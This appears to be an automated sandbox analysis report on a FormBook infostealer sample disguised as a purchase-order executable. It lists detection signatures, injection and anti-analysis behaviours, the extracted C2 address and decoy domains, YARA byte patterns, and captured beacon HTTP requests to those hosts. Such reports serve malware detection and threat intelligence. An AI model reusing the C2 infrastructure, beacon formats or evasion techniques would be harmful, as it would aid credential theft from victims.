Loading ...

Play interactive tourEdit tour

Analysis Report PO-RFQ # 097663899.exe

Overview

General Information

Sample Name:PO-RFQ # 097663899.exe
Analysis ID:383978
MD5:3a480d8d735efe129dcccea48a054721
SHA1:444f3d7795694fb3fd462b6cf3f5c2776e4a1196
SHA256:006dcd5baa67723c1d34336ca9d3eb55eb53cdb58999a8c6a3a64b28c2848220
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO-RFQ # 097663899.exe (PID: 5964 cmdline: 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe' MD5: 3A480D8D735EFE129DCCCEA48A054721)
    • PO-RFQ # 097663899.exe (PID: 6336 cmdline: C:\Users\user\Desktop\PO-RFQ # 097663899.exe MD5: 3A480D8D735EFE129DCCCEA48A054721)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 3136 cmdline: /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aquaroyaume.com/uabu/"], "decoy": ["khedutbajar.com", "vehicleporn.com", "misanthropedia.com", "partum.life", "tenshinstore.com", "51tayi.com", "rgr.one", "lattakia-imbiss.com", "escalerasdemetal.com", "nationalurc.info", "prettygalglam.com", "globalperfumery.com", "ivulam.xyz", "qingniang.club", "quick2ulube.com", "curiget.xyz", "ujeiakosdka.com", "lacapitalcaferestaurant.com", "agarkovsport.online", "okashidonya.com", "xiaoqiche.net", "solothrone.com", "anilfw.com", "goindutch.com", "buildaputt.com", "salesenablementlaunch.com", "olympicmeados.com", "fastbetusa.com", "lunaferro.com", "realtimesoption.online", "testci20200817122241.com", "smitaaifoods.com", "farmacyfastfood.com", "hecmportal.net", "24410restiveway.com", "aaeonlineaccess.com", "bigbuddyco.com", "banismobarbersop.com", "protectionguru.pro", "almosting.com", "perspectiveofgains.com", "notebankers.com", "southsidesportsmen.com", "kopebitest.com", "santiagosupermarket.com", "cheap.kim", "testjaycypes01.com", "toyota-africa-starlet.com", "sunsetplazaapts.com", "favrrdrones.com", "mayipay9.com", "ahaal20.com", "capitalsportscenter.com", "betslotgames.com", "thejewelcartel.com", "gangubai-ramukaka.com", "virtualmed101.com", "sersali.com", "oldschoolnews.net", "sparta-mc.online", "enisis.info", "denversoccertraining.com", "everythingkeema.com", "assistancephotographe.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        4.2.PO-RFQ # 097663899.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.PO-RFQ # 097663899.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.aquaroyaume.com/uabu/"], "decoy": ["khedutbajar.com", "vehicleporn.com", "misanthropedia.com", "partum.life", "tenshinstore.com", "51tayi.com", "rgr.one", "lattakia-imbiss.com", "escalerasdemetal.com", "nationalurc.info", "prettygalglam.com", "globalperfumery.com", "ivulam.xyz", "qingniang.club", "quick2ulube.com", "curiget.xyz", "ujeiakosdka.com", "lacapitalcaferestaurant.com", "agarkovsport.online", "okashidonya.com", "xiaoqiche.net", "solothrone.com", "anilfw.com", "goindutch.com", "buildaputt.com", "salesenablementlaunch.com", "olympicmeados.com", "fastbetusa.com", "lunaferro.com", "realtimesoption.online", "testci20200817122241.com", "smitaaifoods.com", "farmacyfastfood.com", "hecmportal.net", "24410restiveway.com", "aaeonlineaccess.com", "bigbuddyco.com", "banismobarbersop.com", "protectionguru.pro", "almosting.com", "perspectiveofgains.com", "notebankers.com", "southsidesportsmen.com", "kopebitest.com", "santiagosupermarket.com", "cheap.kim", "testjaycypes01.com", "toyota-africa-starlet.com", "sunsetplazaapts.com", "favrrdrones.com", "mayipay9.com", "ahaal20.com", "capitalsportscenter.com", "betslotgames.com", "thejewelcartel.com", "gangubai-ramukaka.com", "virtualmed101.com", "sersali.com", "oldschoolnews.net", "sparta-mc.online", "enisis.info", "denversoccertraining.com", "everythingkeema.com", "assistancephotographe.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO-RFQ # 097663899.exeVirustotal: Detection: 30%Perma Link
          Source: PO-RFQ # 097663899.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO-RFQ # 097663899.exeJoe Sandbox ML: detected
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO-RFQ # 097663899.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO-RFQ # 097663899.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO-RFQ # 097663899.exe, 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, systray.exe, 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO-RFQ # 097663899.exe, systray.exe

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.aquaroyaume.com/uabu/
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1Host: www.mayipay9.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.salesenablementlaunch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1Host: www.oldschoolnews.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.aquaroyaume.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1Host: www.globalperfumery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1Host: www.kopebitest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1Host: www.farmacyfastfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.bigbuddyco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1Host: www.agarkovsport.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.218 198.54.117.218
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: NFORCENL NFORCENL
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1Host: www.mayipay9.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.salesenablementlaunch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1Host: www.oldschoolnews.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.aquaroyaume.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1Host: www.globalperfumery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1Host: www.kopebitest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1Host: www.farmacyfastfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1Host: www.bigbuddyco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1Host: www.agarkovsport.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.mayipay9.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Apr 2021 11:31:55 GMTContent-Type: text/htmlContent-Length: 793Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta n
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmp, PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
